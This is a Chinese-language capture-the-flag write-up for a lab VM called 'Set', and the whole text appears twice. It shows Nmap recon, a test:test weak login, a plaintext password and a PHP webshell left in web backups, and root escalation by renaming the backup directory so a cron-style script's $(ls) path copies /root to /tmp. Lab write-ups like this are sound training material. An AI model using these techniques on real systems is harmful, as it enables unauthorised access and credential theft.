本文记录了一次靶机渗透测试的实战过程。主要步骤包括:通过Nmap扫描发现暴露的Web备份目录和Cockpit Web管理服务;使用弱口令 test:test 登录后,在备份文件中发现了 user1 的明文密码以及一个PHP Webshell;在提权阶段,分析发现 /opt/dsz.sh 脚本存在逻辑缺陷,通过将 backup 目录重命名为隐藏文件(mv backup .backup),使得脚本中的 $(ls) 命令返回空值,巧妙利用路径拼接漏洞将 /root 目录完整拷贝至 /tmp 并赋予777权限,最终成功读取 root 密码完成越权。 本文记录了一次靶机渗透测试的实战过程。主要步骤包括:通过Nmap扫描发现暴露的Web备份目录和Cockpit Web管理服务;使用弱口令 test:test 登录后,在备份文件中发现了 user1 的明文密码以及一个PHP Webshell;在提权阶段,分析发现 /opt/dsz.sh 脚本存在逻辑缺陷,通过将 backup 目录重命名为隐藏文件(mv backup .backup),使得脚本中的 $(ls) 命令返回空值,巧妙利用路径拼接漏洞将 /root 目录完整拷贝至 /tmp 并赋予777权限,最终成功读取 root 密码完成越权。
信息收集
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-18 15:16 UTC
Nmap scan report for 192.168.110.218
Host is up (0.00048s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2025-12-16 05:11 backup/
| - 2025-12-16 07:31 backup/root/
| - 2025-12-16 07:32 backup/user1/
| - 2025-12-16 07:32 backup/user2/
|_
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Index of /
9090/tcp open http Cockpit web service 221 - 253
|_http-title: Did not follow redirect to https://192.168.110.218:9090/
MAC Address: 08:00:27:9B:77:32 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.64 secondshttp://192.168.110.218:9090/ 是一个web版本ssh
漏洞分析
➜ Set ssh root@192.168.110.218
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
-----use test:test to login-----
----- OpenSSH Server Down -----
root@192.168.110.218's password:利用
在Web登录
test@Set:/var/www/html/backup$ ls user1
i3xFNqpty2xyRWw1PAH6_shell.php index.html
test@Set:/var/www/html/backup$ ls user2
index.html
test@Set:/var/www/html/backup$ ls root/
index.html user1_system_password.txt
test@Set:/var/www/html/backup$ cat root/user1_system_password.txt
0I8jV88cyzevAH5KA4ctuser1:0I8jV88cyzevAH5KA4ct以及一个http://192.168.110.218/backup/user1/i3xFNqpty2xyRWw1PAH6_shell.php
ssh user1@192.168.110.218 → user.txt
http://192.168.110.218/backup/user1/i3xFNqpty2xyRWw1PAH6_shell.php → www-data用户shell
权限提升
在/opt发现文件dsz.sh
#!/bin/bash
# author: ll104567
# date: 2025.12.16
# set -e
web_path="/var/www/html"
cd $web_path
backup_file=$(ls)
root_file="$backup_file/root"
user1_file="$backup_file/user1"
user2_file="$backup_file/user2"
[ -d "$root_file" ] && cp -a $root_file /tmp/root && chmod -R 777 /tmp/root
[ $? -eq 0 ] && echo "Plan 1 ok" || echo "Plan 1 failed"
[ -d "$user1_file" ] && cp -a $user1_file /tmp/user1 && chmod -R 777 /tmp/user1
[ $? -eq 0 ] && echo "Plan 2 ok" || echo "Plan 2 failed"
[ -d "$user2_file" ] && cp -a $user2_file /tmp/user2 && chmod -R 777 /tmp/user2
[ $? -eq 0 ] && echo "Plan 3 ok" || echo "Plan 3 failed"backup_file=$(ls)存在漏洞 思路:使用ls,让其文件夹不显示文件(backup→’ ‘;backup→.backup)。 使root_file="$backup_file/root"变为/root
www-data@Set:…/www/html# mv backup .backup
user1@Set:/var/www/html$ cd /tmp/root/root
user1@Set:/tmp/root/root$ ls
index.html rootpass.bak root.txt user1_system_password.txt
user1@Set:/tmp/root/root$ cat rootpass.bak
QK1emfs2oYtFisVLc096
user1@Set:/tmp/root/root$ su root
Password:
root@Set:/tmp/root/root# id
uid=0(root) gid=0(root) groups=0(root)经验教训
This post has not been translated to English yet.
信息收集
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-18 15:16 UTC
Nmap scan report for 192.168.110.218
Host is up (0.00048s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2025-12-16 05:11 backup/
| - 2025-12-16 07:31 backup/root/
| - 2025-12-16 07:32 backup/user1/
| - 2025-12-16 07:32 backup/user2/
|_
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Index of /
9090/tcp open http Cockpit web service 221 - 253
|_http-title: Did not follow redirect to https://192.168.110.218:9090/
MAC Address: 08:00:27:9B:77:32 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.64 secondshttp://192.168.110.218:9090/ 是一个web版本ssh
漏洞分析
➜ Set ssh root@192.168.110.218
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
-----use test:test to login-----
----- OpenSSH Server Down -----
root@192.168.110.218's password:利用
在Web登录
test@Set:/var/www/html/backup$ ls user1
i3xFNqpty2xyRWw1PAH6_shell.php index.html
test@Set:/var/www/html/backup$ ls user2
index.html
test@Set:/var/www/html/backup$ ls root/
index.html user1_system_password.txt
test@Set:/var/www/html/backup$ cat root/user1_system_password.txt
0I8jV88cyzevAH5KA4ctuser1:0I8jV88cyzevAH5KA4ct以及一个http://192.168.110.218/backup/user1/i3xFNqpty2xyRWw1PAH6_shell.php
ssh user1@192.168.110.218 → user.txt
http://192.168.110.218/backup/user1/i3xFNqpty2xyRWw1PAH6_shell.php → www-data用户shell
权限提升
在/opt发现文件dsz.sh
#!/bin/bash
# author: ll104567
# date: 2025.12.16
# set -e
web_path="/var/www/html"
cd $web_path
backup_file=$(ls)
root_file="$backup_file/root"
user1_file="$backup_file/user1"
user2_file="$backup_file/user2"
[ -d "$root_file" ] && cp -a $root_file /tmp/root && chmod -R 777 /tmp/root
[ $? -eq 0 ] && echo "Plan 1 ok" || echo "Plan 1 failed"
[ -d "$user1_file" ] && cp -a $user1_file /tmp/user1 && chmod -R 777 /tmp/user1
[ $? -eq 0 ] && echo "Plan 2 ok" || echo "Plan 2 failed"
[ -d "$user2_file" ] && cp -a $user2_file /tmp/user2 && chmod -R 777 /tmp/user2
[ $? -eq 0 ] && echo "Plan 3 ok" || echo "Plan 3 failed"backup_file=$(ls)存在漏洞 思路:使用ls,让其文件夹不显示文件(backup→’ ‘;backup→.backup)。 使root_file="$backup_file/root"变为/root
www-data@Set:…/www/html# mv backup .backup
user1@Set:/var/www/html$ cd /tmp/root/root
user1@Set:/tmp/root/root$ ls
index.html rootpass.bak root.txt user1_system_password.txt
user1@Set:/tmp/root/root$ cat rootpass.bak
QK1emfs2oYtFisVLc096
user1@Set:/tmp/root/root$ su root
Password:
root@Set:/tmp/root/root# id
uid=0(root) gid=0(root) groups=0(root)